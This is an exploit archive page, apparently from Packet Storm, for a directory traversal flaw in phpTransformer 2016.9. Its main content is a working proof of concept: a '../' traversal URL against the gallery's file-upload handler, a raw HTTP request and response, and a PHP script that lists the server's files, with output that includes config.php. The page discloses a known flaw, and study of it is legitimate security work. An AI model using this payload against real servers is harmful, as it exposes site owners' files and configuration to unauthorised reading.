exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

phpTransformer 2016.9 Directory Traversal

phpTransformer 2016.9 Directory Traversal
Posted Jan 18, 2019
Authored by Ihsan Sencan

phpTransformer version 2016.9 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
SHA-256 | a20f11dd15b8e72aeae8a645d379b75411ac5e21fc1fd932d7f0be1028d00e99

phpTransformer 2016.9 Directory Traversal

Change Mirror Download
# Exploit Title: phpTransformer 2016.9 - Directory Traversal
# Dork: N/A
# Date: 2019-01-18
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://phptransformer.com/
# Software Link: https://netcologne.dl.sourceforge.net/project/phptransformer/Version%202016.9/release_2016.9.zip
# Version: 2016.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC:
# 1)
# http://localhost/[PATH]/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../
#

GET /[PATH]/phpTransformer-2016.9-Directory-raversal.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=2hsc4lr80e0lv14jorun0bs390; browserupdateorg=pause; phpwcmsBELang=en; phpwcmsBEItemsPerPage=25; Contemplate=visitor_ID%3DDzk7W2LkwvYjLr4j-20190117235156; phpTransformer=9th36daohkgnuoqm0mmck5her6; phpTransformerSetup=gtaavf8vg8t63s4qhg98q6pi22; TawkConnectionTime=0; __tawkuuid=e::localhost::L/LRDuMLZaB4u3yegW9pKFQGnt3becl4U6WG0DrN27cIjyTFhHLpZf4VKwUqD3qh::2
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Thu, 17 Jan 2019 23:19:59 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1535
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<?php
header ('Content-type: text/html; charset=UTF-8');
$url= "http://localhost/ExploitDb/release_2016.9/Programs/gallery/admin/jQueryFileUploadmaster/server/php/index.php?path=../../../../../../";
$url = file_get_contents($url);
$l = json_decode($url, true);
if($l){
echo "*-----------------------------*<br />";
foreach($l['files'] as $u){
echo "[-] Name:" .$u['name']." / Size:" .$u['size']."<br />";
}
echo "*-----------------------------*";}
?>

*-----------------------------*
[-] Name:ErrorPage.php / Size:1911
[-] Name:FootContainer.php / Size:968
[-] Name:Global.php / Size:11020
[-] Name:LICENSE.md / Size:36552
[-] Name:MainContainer.php / Size:4365
[-] Name:MarqueeContainer.php / Size:2394
[-] Name:MenuContainer.php / Size:1782
[-] Name:NavCont.php / Size:387
[-] Name:ProgramsContainer.php / Size:5869
[-] Name:README.md / Size:286
[-] Name:SecondairyContainer.php / Size:5169
[-] Name:Themes.php / Size:6830
[-] Name:TopContainer.php / Size:1378
[-] Name:a.php / Size:119
[-] Name:admin(renamed).php / Size:23841
[-] Name:animated_favicon.gif / Size:21501
[-] Name:cache.php / Size:2385
[-] Name:config.php / Size:997
[-] Name:favicon.ico / Size:4286
[-] Name:friendly.php / Size:2047
[-] Name:gadget.php / Size:2864
[-] Name:includes.php / Size:1575
[-] Name:index.php / Size:7343
[-] Name:l.php / Size:119
*-----------------------------*

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close